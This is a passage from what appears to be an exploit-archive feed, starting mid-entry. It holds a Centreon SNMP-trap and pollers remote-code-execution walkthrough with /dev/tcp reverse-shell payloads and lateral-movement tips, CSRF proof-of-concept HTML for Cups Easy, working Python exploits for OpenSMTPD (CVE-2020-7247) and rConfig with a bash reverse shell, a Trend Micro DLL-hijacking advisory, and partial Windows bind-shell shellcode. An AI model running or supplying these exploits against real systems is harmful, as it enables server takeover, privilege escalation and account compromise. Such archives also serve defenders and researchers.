[+] Special Command : 0<&121-;exec 121<>/dev/tcp/127.0.0.1/12345;sh <&121 >&121 2>&121
# Objective 2 : Create passive service and use App-Monitoring-Centreon-Service-Dummy
- Configuration > Services > Services by host
[+] Description * : TRAP RCE
[+] Linked with Hosts * : YOUR-LINKED-HOST
[+] Check Command * : App-Monitoring-Centreon-Service-Dummy
[+] DUMMYSTATUS : 0
[+] DUMMYOUTPUT : 0
[+] Passive Checks Enabled : YES
[+] Is Volatile : YES
[+] Service Trap Relation : Generic - linkDown
# Objective 3 : Assign service trap relation
- Configuration > SNMP Traps
- linkDown
- Relations
[+] Linked services : YOUR-LINKED-HOST - SERVICE DESCRIPTION
reload Central
Reload snmp config
# Objective 4 : Get centreon id reverse shell and think lateral
[+] Send your trap
snmptrap -v2c -c public 127.0.0.1 '' .1.3.6.1.6.3.1.1.5.3 ifIndex i 1 ifadminStatus i 2 ifOperStatus i 2
TIP: centreontrapd logfile:
2020-01-29 02:52:33 - DEBUG - 340 - Reading trap. Current time: Wed Jan 29 02:52:33 2020
2020-01-29 02:52:33 - DEBUG - 340 - Symbolic trap variable name detected (DISMAN-EVENT-MIB::sysUpTimeInstance). Will attempt to translate to a numerical OID
2020-01-29 02:52:33 - DEBUG - 340 - Translated to .1.3.6.1.2.1.1.3.0
2020-01-29 02:52:33 - DEBUG - 340 - Symbolic trap variable name detected (SNMPv2-MIB::snmpTrapOID.0). Will attempt to translate to a numerical OID
...
2020-01-29 02:52:33 - DEBUG - 340 - Trap found on service 'TRAP RCE' for host 'supervision_IT'.
...
2020-01-29 02:52:43 - INFO - 1757 - EXEC: Launch specific command
2020-01-29 02:52:43 - INFO - 1757 - EXEC: Launched command: 0<&121-;exec 121<>/dev/tcp/127.0.0.1/12345;sh <&121 >&121 2>&121
..
NOTE: Read the doc !!!
https://documentation-fr.centreon.com/docs/centreon/fr/latest/administration_guide/poller/ssh_key.html?highlight=keygen
The centreon id user shares configurations and instructions with satellite collectors trough SSH.
No passphrase used.
This allows you to move around the infrastructure after your RCE.
POC:
snmptrap -v2c -c public 127.0.0.1 '' .1.3.6.1.6.3.1.1.5.3 ifIndex i 1 ifadminStatus i 2 ifOperStatus i 2
nc -lvnp 12345
Ncat: Version 7.50
Ncat: Listening on :::12345
Ncat: Listening on 0.0.0.0:12345
Ncat: Connection from 127.0.0.1.
Ncat: Connection from 127.0.0.1:38470.
id
uid=997(centreon) gid=994(centreon) groups=994(centreon),48(apache),990(centreon-engine),992(centreon-broker)
sudo -l
Matching Defaults entries for centreon on centreonlab:
!visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin,
env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS",
env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE",
env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES",
env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE",
env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",
secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin, !requiretty
User centreon may run the following commands on centreonlab:
(root) NOPASSWD: /sbin/service centreontrapd start
(root) NOPASSWD: /sbin/service centreontrapd stop
(root) NOPASSWD: /sbin/service centreontrapd restart
(root) NOPASSWD: /sbin/service centreontrapd reload
(root) NOPASSWD: /usr/sbin/service centreontrapd start
(root) NOPASSWD: /usr/sbin/service centreontrapd stop
(root) NOPASSWD: /usr/sbin/service centreontrapd restart
(root) NOPASSWD: /usr/sbin/service centreontrapd reload
(root) NOPASSWD: /sbin/service centengine start
(root) NOPASSWD: /sbin/service centengine stop
(root) NOPASSWD: /sbin/service centengine restart
(root) NOPASSWD: /sbin/service centengine reload
(root) NOPASSWD: /usr/sbin/service centengine start
(root) NOPASSWD: /usr/sbin/service centengine stop
(root) NOPASSWD: /usr/sbin/service centengine restart
(root) NOPASSWD: /usr/sbin/service centengine reload
(root) NOPASSWD: /bin/systemctl start centengine
(root) NOPASSWD: /bin/systemctl stop centengine
(root) NOPASSWD: /bin/systemctl restart centengine
(root) NOPASSWD: /bin/systemctl reload centengine
(root) NOPASSWD: /usr/bin/systemctl start centengine
(root) NOPASSWD: /usr/bin/systemctl stop centengine
(root) NOPASSWD: /usr/bin/systemctl restart centengine
(root) NOPASSWD: /usr/bin/systemctl reload centengine
(root) NOPASSWD: /sbin/service cbd start
(root) NOPASSWD: /sbin/service cbd stop
(root) NOPASSWD: /sbin/service cbd restart
(root) NOPASSWD: /sbin/service cbd reload
(root) NOPASSWD: /usr/sbin/service cbd start
(root) NOPASSWD: /usr/sbin/service cbd stop
(root) NOPASSWD: /usr/sbin/service cbd restart
(root) NOPASSWD: /usr/sbin/service cbd reload
(root) NOPASSWD: /bin/systemctl start cbd
(root) NOPASSWD: /bin/systemctl stop cbd
(root) NOPASSWD: /bin/systemctl restart cbd
(root) NOPASSWD: /bin/systemctl reload cbd
(root) NOPASSWD: /usr/bin/systemctl start cbd
(root) NOPASSWD: /usr/bin/systemctl stop cbd
(root) NOPASSWD: /usr/bin/systemctl restart cbd
(root) NOPASSWD: /usr/bin/systemctl reload cbd
↧
Cups Easy 1.0 Cross Site Request Forgery
Cups Easy version 1.0 suffers from a cross site request forgery vulnerability.
cafc75de89af6e63e57122e223d909bb# Title: Cups Easy 1.0 - Cross Site Request Forgery (Password Reset)
# Date: 2020-01-28
# Exploit Author: J3rryBl4nks
# Vendor Homepage: https://sourceforge.net/u/ajayshar76/profile/
# Software Link: https://sourceforge.net/projects/cupseasy/files/cupseasylive-1.0/
# Version: 1.0
# Tested on Windows 10/Kali Rolling
# CVE: CVE-2020-8424, CVE-2020-8425
# The Cups Easy (Purchase & Inventory) 1.0 web application is vulnerable to Cross Site Request Forgery
# that would allow an attacker to change the Admin password and gain unrestricted
# access to the site or delete any user.
# Proof of Concept Code for Password Change:
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://SITEADDRESS/cupseasylive/passwordmychange.php" method="POST">
<input type="hidden" name="username" value="admin" />
<input type="hidden" name="password" value="PASSWORDHERE" />
<input type="hidden" name="change" value="Change" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
# Proof of concept for user delete:
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://SITEADDRESS/cupseasylive/userdelete.php" method="POST">
<input type="hidden" name="username" value="admin" />
<input type="hidden" name="delete" value="Delete" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
↧
↧
Centreon 19.10.5 Remote Command Execution
Centreon version 19.10.5 suffers from a Pollers remote command execution vulnerability.
74b4928a515161688d46037ed3182142# Exploit Title: Centreon 19.10.5 - 'Pollers' Remote Command Execution
# Date: 2020-01-27
# Exploit Author: Omri Baso, Fabien Aunay
# Vendor Homepage: https://www.centreon.com/
# Software Link: https://github.com/centreon/centreon
# Version: 19.10.5
# Tested on: CentOS 7.7
# CVE : -
Centreon 19.10.5 Remote Command Execution Misc
Trusted by SMBs and Fortune 500 companies worldwide.
An industry reference in IT Infrastructure monitoring for the enterprise.
Counts 200,000+ ITOM users worldwide and an international community of software collaborators.
Presence in Toronto and Luxembourg.
Deployed in diverse sectors:
- IT & telecommunication
- Transportation
- Government
- Heath care
- Retail
- Utilities
- Finance & Insurance
- Aerospace & Defense
- Manufacturing
- etc.
User input isn't sanitized for safe use - and it is possible to gain a Remote Code Execution of the server
hosting the Centreon Service leading to a full server takeover with the user "apache"
Steps:
1.) <BASEURL>/centreon/main.php?p=60803&type=3
Here we create the Command - can also be found under
Configuration > Commands > Miscellaneous
we Press "Add" -
Command Name: "misc"
Payload: 0<&121-;exec 121<>/dev/tcp/127.0.0.1/1234;sh <&121 >&121 2>&121
2.) go to: <BASEURL>/centreon/main.php?p=60901
Configuration > Pollers
Open "Central" Poller
add on "Post-Restart command"
the command "misc" we created
make Status "Enabled"
3.) Check the box "Post generation command" in the "Export Configuration" Tab
3.1) Restart Poller and get Shell.
┌─[root@vps]─[~]
└──╼ #nc -lnvp 1234
Ncat: Version 7.50 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 127.0.0.1.
Ncat: Connection from 127.0.0.1:49184.
whoami
apache
id
uid=48(apache) gid=48(apache) groups=48(apache),990(centreon-engine),992(centreon-broker),993(nagios),994(centreon)
___________________________________________________________________
↧
OpenSMTPD 6.6.2 Remote Code Execution
OpenSMTPD version 6.6.2 remote code execution exploit.
720e1a175b5cc8abf21ab6dbeb5c21e7# Exploit Title: OpenSMTPD 6.6.2 - Remote Code Execution
# Date: 2020-01-29
# Exploit Author: 1F98D
# Original Author: Qualys Security Advisory
# Vendor Homepage: https://www.opensmtpd.org/
# Software Link: https://github.com/OpenSMTPD/OpenSMTPD/releases/tag/6.6.1p1
# Version: OpenSMTPD < 6.6.2
# Tested on: Debian 9.11 (x64)
# CVE: CVE-2020-7247
# References:
# https://www.openwall.com/lists/oss-security/2020/01/28/3
#
# OpenSMTPD after commit a8e222352f and before version 6.6.2 does not adequately
# escape dangerous characters from user-controlled input. An attacker
# can exploit this to execute arbitrary shell commands on the target.
#
#!/usr/local/bin/python3
from socket import *
import sys
if len(sys.argv) != 4:
print('Usage {} <target ip> <target port> <command>'.format(sys.argv[0]))
print("E.g. {} 127.0.0.1 25 'touch /tmp/x'".format(sys.argv[0]))
sys.exit(1)
ADDR = sys.argv[1]
PORT = int(sys.argv[2])
CMD = sys.argv[3]
s = socket(AF_INET, SOCK_STREAM)
s.connect((ADDR, PORT))
res = s.recv(1024)
if 'OpenSMTPD' not in str(res):
print('[!] No OpenSMTPD detected')
print('[!] Received {}'.format(str(res)))
print('[!] Exiting...')
sys.exit(1)
print('[*] OpenSMTPD detected')
s.send(b'HELO x\r\n')
res = s.recv(1024)
if '250' not in str(res):
print('[!] Error connecting, expected 250')
print('[!] Received: {}'.format(str(res)))
print('[!] Exiting...')
sys.exit(1)
print('[*] Connected, sending payload')
s.send(bytes('MAIL FROM:<;{};>\r\n'.format(CMD), 'utf-8'))
res = s.recv(1024)
if '250' not in str(res):
print('[!] Error sending payload, expected 250')
print('[!] Received: {}'.format(str(res)))
print('[!] Exiting...')
sys.exit(1)
print('[*] Payload sent')
s.send(b'RCPT TO:<root>\r\n')
s.recv(1024)
s.send(b'DATA\r\n')
s.recv(1024)
s.send(b'\r\nxxx\r\n.\r\n')
s.recv(1024)
s.send(b'QUIT\r\n')
s.recv(1024)
print('[*] Done')
↧
rConfig 3.9.3 Remote Code Execution
rConfig version 3.9.3 suffers from an authenticated remote code execution vulnerability.
26b376c625041af03fef93e48412214a# Exploit Title: rConfig 3.9.3 - Authenticated Remote Code Execution
# Date: 2019-11-07
# CVE-2019-19509
# Exploit Author: vikingfr
# Vendor Homepage: https://rconfig.com/ (see also : https://github.com/rconfig/rconfig)
# Software Link : http://files.rconfig.com/downloads/scripts/centos7_install.sh
# Version: tested v3.9.3
# Tested on: Apache/2.4.6 (CentOS 7.7) OpenSSL/1.0.2k-fips PHP/7.2.24
#
# Notes : If you want to reproduce in your lab environment follow those links :
# http://help.rconfig.com/gettingstarted/installation
# then
# http://help.rconfig.com/gettingstarted/postinstall
#
# $ python3 rconfig_CVE-2019-19509.py https://192.168.43.34 admin root 192.168.43.245 8081
# rconfig - CVE-2019-19509 - Web authenticated RCE
# [+] Logged in successfully, triggering the payload...
# [+] Check your listener !
# ...
# $ nc -nvlp 8081
# listening on [any] 8081 ...
# connect to [192.168.43.245] from (UNKNOWN) [192.168.43.34] 34458
# bash: no job control in this shell
# bash-4.2$ id
# id
# uid=48(apache) gid=48(apache) groups=48(apache)
# bash-4.2$
#!/usr/bin/python3
import requests
import sys
import urllib.parse
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
print ("rconfig - CVE-2019-19509 - Web authenticated RCE")
if len(sys.argv) != 6:
print ("[+] Usage : ./rconfig_exploit.py https://target username password yourIP yourPort")
exit()
target = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]
ip = sys.argv[4]
port = sys.argv[5]
payload = '''`bash -i>& /dev/tcp/{0}/{1} 0>&1`'''.format(ip, port)
request = requests.session()
login_info = {
"user": username,
"pass": password,
"sublogin": 1
}
login_request = request.post(
target+"/lib/crud/userprocess.php",
login_info,
verify=False,
allow_redirects=True
)
dashboard_request = request.get(target+"/dashboard.php", allow_redirects=False)
if dashboard_request.status_code == 200:
print ("[+] Logged in successfully, triggering the payload...")
encoded_request = target+"/lib/ajaxHandlers/ajaxArchiveFiles.php?path={0}&ext=random".format(urllib.parse.quote(payload))
print ("[+] Check your listener !")
exploit_req = request.get(encoded_request)
elif dashboard_request.status_code == 302:
print ("[-] Wrong credentials !")
exit()
↧
TrendMicro Anti-Threat Toolkit Improper Fix
The fix that was applied to address a code execution vulnerability in Trend Micro Anti-Threat Toolkit (ATTK) was insufficient.
d1a12b9a4603d65949a06bbd3e3891bdHi @ll,
on September 29, 2019, John Page reported a remote code execution
with escalation of privilege in TrendMicro's Anti-Threat Toolkit
to its vendor.
TrendMicro assigned CVE-2019-9491 to this vulnerability and told
the reporter, his dog and the world on October 18, 2019, that they
had fixed the vulnerable product.
See <https://success.trendmicro.com/solution/000149878>,
<https://seclists.org/fulldisclosure/2019/Oct/42> and
<http://hyp3rlinx.altervista.org/advisories/TREND-MICRO-ANTI-THREAT-TOOLKIT-(ATTK)-REMOTE-CODE-EXECUTION.txt>
TrendMicro's claim was but wrong, the vulnerability was NOT FIXED!
The files attk_ScanCleanOffline_gui_x86.exe, attk_collector_cli_x86.exe,
attk_ScanCleanOffline_gui_x64.exe and attk_collector_cli_x64.exe
offered on <https://spnsupport.trendmicro.com/> were STILL vulnerable,
as was their payload!
Vulnerability #1:
~~~~~~~~~~~~~~~~~
On a fully patched Windows 7 SP1, the executable self-extractors
attk_ScanCleanOffline_gui_x86.exe, attk_collector_cli_x86.exe,
attk_ScanCleanOffline_gui_x64.exe and attk_collector_cli_x64.exe
loaded and executed at least the following DLLs from their
"application directory", typically the user's "Downloads" folder
%USERPROFILE%\Downloads\, instead from Windows'"system directory"
%SystemRoot%\System32\
VERSION.dll, IPHLPAPI.dll, WINNSI.dll, WINHTTP.dll, WEBIO.dll,
DHCPCSVC.dll, CRYPTSP.dll, BCRYPT.dll, NCRYPT.dll, DNSAPI.dll,
RASADHLP.dll, PROPSYS.dll, APPHELP.dll
On other versions of Windows this list varied, but some DLLs were
ALWAYS loaded from the "application directory"!
This BEGINNER's error is well-known and well-documented since MORE
than 20 years:
see <https://capec.mitre.org/data/definitions/471.html>,
<https://cwe.mitre.org/data/definitions/426.html>,
<https://cwe.mitre.org/data/definitions/427.html>,
<https://blogs.msdn.microsoft.com/david_leblanc/2008/02/20/dll-preloading-attacks/>,
<https://insights.sei.cmu.edu/cert/2008/09/carpet-bombing-and-directory-poisoning.html>,
<http://www.binaryplanting.com/index.htm>,
<https://attack.mitre.org/wiki/Technique/T1073>,
<https://skanthak.homepage.t-online.de/sentinel.html>,
<https://skanthak.homepage.t-online.de/verifier.html>,
<https://skanthak.homepage.t-online.de/!execute.html>,
<https://skanthak.homepage.t-online.de/minesweeper.html>
Demonstration/Proof of concept:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Follow <https://skanthak.homepage.t-online.de/minesweeper.html>,
build a "minefield" of forwarder DLLs, then copy attk_*.exe into
the directory where you built the DLLs and execute it: enjoy the
multiple message boxes displayed from the forwarder DLLs.
Vulnerability #2:
~~~~~~~~~~~~~~~~~
On all versions of Windows, the batch script batCollector.bat,
unpacked from the executable extractors, which controls execution
of the TrendMicro AntiThreat Toolkit itself, executed
findstr.com/findstr.exe/findstr.bat/findstr.cmd
plus
REG.com/REG.exe/REG.bat/REG.cmd
(see the environment variable PATHEXT for the extensions) from
the directory
"TrendMicro AntiThreat Toolkit\HC_ATTK"
where the batch script batCollector.bat lives:
--- batCollector.bat ---
| @echo off
| setlocal disableDelayedExpansion
| set wd=%~dp0
| cd /d %wd%
...
| for /f "tokens=*" %%a in ('findstr BatCollector= ..\..\config.ini') do (
...
| REG EXPORT ...
...
findstr and REG are called in the script without file extension and
without path (although BOTH are well-known), so CMD.exe runs
findstr.com/findstr.exe/findstr.bat/findstr.cmd and
REG.com/REG.exe/REG.bat/REG.cmd from its "current working directory"
"TrendMicro AntiThreat Toolkit\HC_ATTK"
The missing path and extension are BEGINNER'S error #2.
Again see <https://cwe.mitre.org/data/definitions/426.html>,
<https://cwe.mitre.org/data/definitions/427.html>
and <https://capec.mitre.org/data/definitions/471.html>
Vulnerability #3:
~~~~~~~~~~~~~~~~~
The executable self-extractors fail to restrict (at least write)
access to this directory for UNPRIVILEGED users, i.e. allow write
access only for members of the "Administrators" group: this is
BEGINNER'S error #3.
In standard installations of Windows, where the qUACkery-controlled
user account created during setup is used, this UNPROTECTED directory
is therefore writable by the UNPRIVILEGED user who can place a rogue
findstr.com/findstr.exe/findstr.bat/findstr.cmd and
REG.com/REG.exe/REG.bat/REG.cmd there ... and gains administrative
privileges!
Additionally an UNPRIVILEGED attacker can add arbitrary command
lines to the UNPROTECTED batch script batCollector.bat between its
creation and its execution, or replace it completely.
Again see <https://cwe.mitre.org/data/definitions/426.html>,
<https://cwe.mitre.org/data/definitions/427.html>
and <https://capec.mitre.org/data/definitions/471.html>,
plus <https://cwe.mitre.org/data/definitions/732.html>,
<https://cwe.mitre.org/data/definitions/377.html>,
<https://cwe.mitre.org/data/definitions/379.html>
and <https://capec.mitre.org/data/definitions/29.html>
stay tuned, and FAR AWAY from so-called security products:
their "security" is typically worse than that of the products
they claim to protect!
Stefan Kanthak
PS: the TrendMicro Anti-Threat Toolkit inspected in October 2019
was built from scrap: the developers used VisualStudio 2008
(end-of-life since two years), linked against an outdated and
vulnerable LIBCMT, shipped an outdated and vulnerable cURL 7.48
plus an outdated and vulnerable libeay32.dll 1.0.1.17 (OpenSSL
1.0.1 is end-of-life since more than 3 years; the last version
was 1.0.1.20).
This POOR (really: TOTAL lack of proper) software engineering
alone disqualifies this vendor and its "security" products!
JFTR: "they'll never come back" (really: developers SELDOM learn)
<https://seclists.org/fulldisclosure/2010/Sep/332>
<https://seclists.org/fulldisclosure/2015/Dec/128>
Timeline:
~~~~~~~~~
2019-10-23 sent reports for both vulnerabilities to vendor
2019-10-25 vendor acknowledged receipt
2020-01-07 CVE-2019-20358 assigned by vendor
2020-01-29 updated advisory published by vendor
↧
↧
Windows/x86 Dynamic Bind Shell / Null-Free Shellcode
571 bytes small Microsoft Windows x86 dynamic bind shell and null-free shellcode.
61ae8434a5edb8b37775ebb965df9ff6# Shellcode Title: Windows/x86 - Dynamic Bind Shell + Null-Free Shellcode (571 Bytes)
# Shellcode Author: Bobby Cooke
# Date: 2020-01-30
# Technique: PEB & Export Directory Table
# Tested On: Windows 10 Pro (x86) 10.0.18363 Build 18363
# Shellcode Function: When executed, this shellcode creates a cmd.exe bind shell, using the CreateProcessA function on TCP port 4444, on all IP interfaces.
# Reason for Creating: When learning x86 Windows Dynamic Shellcoding, I experienced great difficulty in finding a detailed bind shell example to learn from. Their are many great examples for creating dynamic MessageBox shellcode, dynamic bind shellcode for x86 Linux, and many examples of Windows version dependent shellcode; with hardcoded library addresses. Metasploit has a great, compact, reliable, dynamic Windows x86 bind shellcode, but trying to reverse engineer it, to learn, is no small task. MetaSploits payload is great because it uses the best known shellcoding shortcut techniques. Unfortunately for the Security Researcher new to x86 Windows Shellcoding these shortcuts are very advanced concepts to take on right from the start. Hopefully this horribly large shellcode will help someone learn x86 Dynamic Windows shellcoding easier than the path I took.
# Special Thanks & Credits to: Skape, 0xDarkVortex/paranoidninja, Corelan, Offensive Security, Vivek & Pentester Academy, Tulpa, sh3llc0d3r
# Create a new stack frame
push ebp ; push current base pointer to the stack
mov ebp, esp ; Set Base Stack Pointer for new Stack-Frame
sub esp, 0x60 ; Decrement the stack by 96 to create space for saving pointers
# Push string "GetProcAddress",0x00 onto the stack
xor eax, eax ; clear eax register
mov ax, 0x7373 ; AX is the lower 16-bits of the 32bit EAX Register
push eax ; ss : 73730000 // EAX = 0x00007373 // \x73=ASCII "s"
push 0x65726464 ; erdd : 65726464 // "GetProcAddress"
push 0x41636f72 ; Acor : 41636f72
push 0x50746547 ; PteG : 50746547
mov [ebp-0x4], esp ; save PTR to string at bottom of stack (ebp)
# Find Base Address of the kernel32.dll Dynamically Linked Library
; - In Windows, the FS Segment Register will always point to the Thread Environment Block (TEB).
; - This shellcode is dynamic & does not rely on any hardcoded addresses.
; - The addresses in the comments are used as an example and will be different for you.
; - The easiest way to get the WinDbg commands to work is to connect to the Windows Symbol Server.
; - On new versions of Windows, kernel32.dll is the 3rd dll in the Initialization Order Module List.
; - On older versions of Windows, kernel32.dll was the 2nd dll. Now the 2nd dll is kernelbase.dll.
; - Interestingly kernelbase.dll also has functions like LoadLibraryA & GetProcAddress.
; - kernelbase.dll can be used instead of kernel32.dll sometimes, but we will stick with kernel32.dll.
xor eax, eax ; clear eax register
mov eax, [fs:eax+0x30] ; #1| Get PEB Address from within the TEB; leveraging the FS Register.
; WinDbg> !teb
; TEB at 002e9000
; WinDbg> dt nt!_TEB 002e9000
; +0x030 ProccessEnviromentBlock: 0x002e8000 _PEB
; EAX = 0x002e8000 (Address_of_PEB)
mov eax, [eax+0xc] ; #2| Get the LDR Address from within the PEB.
; WinDbg> dt nt!_PEB 002e8000
; +0x00c Ldr : 0x77becb80 _PEB_LDR_DATA
; EAX = 0x77becb80 (Address_of_LDR)
mov eax, [eax+0x1c] ; #3| Get the first entry in the Initialization Order Module List (ntdll.dll)
; WinDbg> dt nt!_PEB_LDR_DATA 0x77becb80
; +0x01c InInitializationOrderModuleList : _LIST_ENTRY
; WinDbg> db 0x77becb80+1c
; 77becb9c 90 1d 5f 00 // First Entry is 0x005f1d90 (reverse for Little Endian)
; WinDbg> db 0x5f1d90
; #00#01#02#03#04#05#06#07#08#09#0a#0b
; 005f1d90 38 26 5f 00 9c cb be 77-00 00 ad 77
; - we see that 0x5f1d90+0x8 is the base address of ntdll.dll - 0x77ad0000
; - ModLoad: 77ad0000 ntdll.dll
; - We also see that the next entry in the list is at 0x005f2638
; EAX = 0x005f1d90 (First Entry of InInitialzationOrderModuleList - ntdll.dll)
; #4| Get the second entry in the Initialization Order Module List (kernelbase.dll)
mov ebx, eax ; - Should be 'mov eax, [eax]', but the opcode contains a null byte 8B00
mov eax, [ebx] ; - Avoid null byte
; WinDbg> dt nt!_LIST_ENTRY 0x5f1d90
; +0x000 Flink : 0x005f2638 _LIST_ENTRY
; WinDbg> db 0x005f2638
; 005f2638 78 22 5f 00 90 1d 5f 00-00 00 56 75
; - We see that 0x005f2638+0x8 is the base address of kernelbase.dll - 0x75560000
; - ModLoad: 75560000 C:\Windows\System32\KERNELBASE.dll
; - We also see that the next entry in the list is at 0x005f2278
; EAX = 0x005f2638 (Second Entry of InInitialzationOrderModuleList - kernelbase.dll)
; #5| Get the third entry in the Initialization Order Module List (kernel32.dll)
mov ebx, eax ; - Should be 'mov eax, [eax]', but the opcode contains a null byte 8B00
mov eax, [ebx] ; - Avoid null byte
; WinDbg> dt nt!_LIST_ENTRY 0x005f2638
; +0x000 Flink : 0x005f2278 _LIST_ENTRY
; WinDbg> db 0x005f2278
; 005f2278 9c cb be 77 38 26 5f 00-00 00 22 76
; - We see that 0x005f2278+0x8 is the base address of kernel32.dll - 0x76220000
; - ModLoad: 76220000 C:\Windows\System32\KERNEL32.DLL
; EAX = 0x005f2278 (Third Entry of InInitialzationOrderModuleList - kernel32.dll)
mov eax, [eax+0x8] ; move the kernel32.dll base address into the EAX register
; EAX = 0x76220000 (Base address of kernel32.dll)
mov [ebp-0x8], eax ; Save the base address of kernel32.dll in the 2nd from bottom position on our stack
# Find Base Address of GetProcAddress Symbol
; - Now that we have the base address of kernel32.dll, we will use it to find the address for the Symbol(function) GetProcAddress.
; - GetProcAddress() will then be used to find the addresses of all other Symbols(functions) that we need.
; - The Export Table technique is used to find the address of GetProcAddress (as detailed in Skapes Windows Shellcoding Paper).
mov ebx, [eax+0x3c] ; save Relative Virtual Address (RVA/Offset) of New_Exe_Header to ebx.
; WinDbg> db 0x76220000+3c
; 7622003c f8 00 00 00 // EBX = 0x000000f8 = Offset to New EXE Header
add ebx, eax ; (kernel32.dll baseAddr) + (RVA New_Exe_Header) = Address of New_Exe_Header
; 0x76220000 + 0xf8 = 0x762200f8
; EBX = 0x762200f8 (Address of new Header)
mov ebx, [ebx+0x78] ; (RVA of New Exe Header) + 0x78 = RVA of Export-Table
; WinDbg> db 0x762200f8+0x78
; 76220170 b0 77 07 00 // EBX = 0x000777b0
add ebx, eax ; (kernel32.dll baseAddr) + (RVA Export-Table) = Address of Export-Table
; 0x76220000 + 0x000777b0 = 0x762977b0
; EBX now holds the address of the Export Table for kernel32.dll (0x762977b0)
mov edi, [ebx+0x20] ; PTR to RVA of Name-Pointer Table
; WinDbg> db 0x762977b0+0x20
; 762977d0 e0 90 07 00 // EDI = 0x000790e0
add edi, eax ; (kernel32.dll baseAddr) + (RVA Name-Pointer Table) = Address of Name-Pointer Table
; 0x76220000 + 0x000790e0 = 0x762990e0
mov [ebp-0xC], edi ; save Address of Name-Pointer Table in the 3rd from bottom position in our stack-frame
mov ecx, [ebx+0x24] ; PTR to RVA of Ordinal Table
add ecx, eax ; (kernel32.dll baseAddr) + (RVA Ordinal Table) = Address of Ordinal Table
mov [ebp-0x10], ecx ; save PTR to Ordinal Table Address at 4th from bottom of stack (ebp-16)
mov edx, [ebx+0x1c] ; PTR to RVA of Address Table
add edx, eax ; (kernel32.dll baseAddr) + (RVA Address Table) = Address of Address Table
mov [ebp-0x14], edx ; save PTR to Address Table Address at 5th from bottom of stack (ebp-20)
mov edx, [ebx+0x14] ; Value of Number of Functions/Symbols within the Tables
xor eax, eax ; Counter = 0
loop:
mov edi, [ebp-0xC] ; Address of the Name-Pointer Table
mov esi, [ebp-0x4] ; PTR to string "GetProcAddress",0x00
xor ecx, ecx ; clear ecx register -- used for counters/loops
cld ; clear direction flag, DF=0 -- Process strings from left to right
mov edi, [edi+eax*4] ; Entries in Name Pointer Table are 4 bytes long
; edi = RVA of Nth entry = (Address of Name-Pointer Table) + (Counter * 4)
add edi, [ebp-0x8] ; edi = address of string = (kernel32.dll base addr) + (RVA of Nth entry)
add cx, 0xf ; ecx = length of string to compare = sizeof("GetProcAddress") = 15 (14 Letters + 1 String Terminator Char)
repe cmpsb ; compare first 15 bytes of string. esi cmp edi
; if equal ZF=1, if not ZF=0
jz found ; if strings match end loop, else increment eax and loop again
inc eax ; counter ++
cmp eax, edx ; check if eax = Value of Number of Functions/Symbols within the Tables
jb loop ; If eax != edx, restart the loop
found:
; The Counter (eax) now holds the poisition of GetProcAddress within the table
mov ecx, [ebp-0x10] ; ecx = Address of Ordinal Table
mov edx, [ebp-0x14] ; edx = Address of Address Table
mov ax, [ecx + eax*2] ; ax = ordinal number = (Address of Ordinal Table) + (counter * 2)
mov eax, [edx + eax*4] ; eax = RVA of function = var20 + (ordinal * 4)
add eax, [ebp-0x8] ; eax = address of GetProcAddress = (RVA of GetProcAddress) + (kernel32.dll base addr)
; Address of GetProcAddress is now in EAX
mov [ebp-0x18], eax ; save Address of GetProcAddress onto Stack 0x18=24; 6th from bottom
; Call GetProcAddress(&kernel32.dll, PTR "LoadLibraryA"0x00)
; Call GetProcAddress(hModule, lpProcName)
; hModule: address of the DLL module that contains the function.
; lpProcName: A Pointer to the beginning of an ASCII string of the functions name; null terminated.
xor edx, edx ; EDX = 0x00000000
push edx ; null terminator for LoadLibraryA string
push 0x41797261 ; Ayra : 41797261 // "LoadLibraryA",0x00
push 0x7262694c ; rbiL : 7262694c
push 0x64616f4c ; daoL : 64616f4c
push esp ; $hModule -- push the address of the start of the string onto the stack
push dword [ebp-0x8] ; $lpProcName -- push base address of kernel32.dll to the stack
mov eax, [ebp-0x18] ; Move the address of GetProcAddress into the EAX register
call eax ; Call the GetProcAddress Function.
; The address of the queried function is returned into the EAX register.
mov [ebp-0x1c], eax ; save Address of LoadLibraryA onto Stack 0x1c=28; 7th from bottom
; Call LoadLibraryA(PTR "ws2_32.dll"0x00)
; push "ws2_32",0x00 (Null terminated) to the stack and save pointer
xor eax, eax ; clear eax
mov ax, 0x3233 ; ASCII: 3 = 0x33, ASCII: 2 = 0x32
push eax ; push 0x00,0x00,"23" to stack (for ws2_32.dll)
push 0x5f327377 ; push "_2sw" to the stack (in reverse)
push esp ; push the pointer to the string to the stack
mov ebx, [ebp-0x1c] ; LoadLibraryA Address to ebx register
call ebx ; call the LoadLibraryA Function to load ws2_32.dll
mov [ebp-0x20], eax ; save Address of ws2_32.dll onto Stack at 0x20=32; 8th from bottom
; Call GetProcAddress(PTR *ws2_32.dll, "WSAStartup"0x00)
xor edx, edx
mov dx, 0x7075 ; pu : 7075
push edx ; push "up",0x0000 to stack from end of string
push 0x74726174 ; trat : 74726174
push 0x53415357 ; SASW : 53415357
push esp ; push pointer to string to stack for 'WSAStartup',0x00
push dword [ebp-0x20] ; push base address of ws2_32.dll to stack
mov eax, [ebp-0x18] ; PTR to GetProcAddress to EAX
call eax ; GetProcAddress(PTR *ws2_32.dll, "WSAStartup"0x00)
; EAX = WSAStartup Address
mov [ebp-0x24], eax ; save Address of WSAStartup onto Stack 0x24=36; 9th from bottom.
; Call WSAStartup - WSAStartUp(MAKEWORD(2, 2), wsadata_pointer)
; int WSAStartup(WORD wVersionRequired, LPWSADATA lpWSAData)
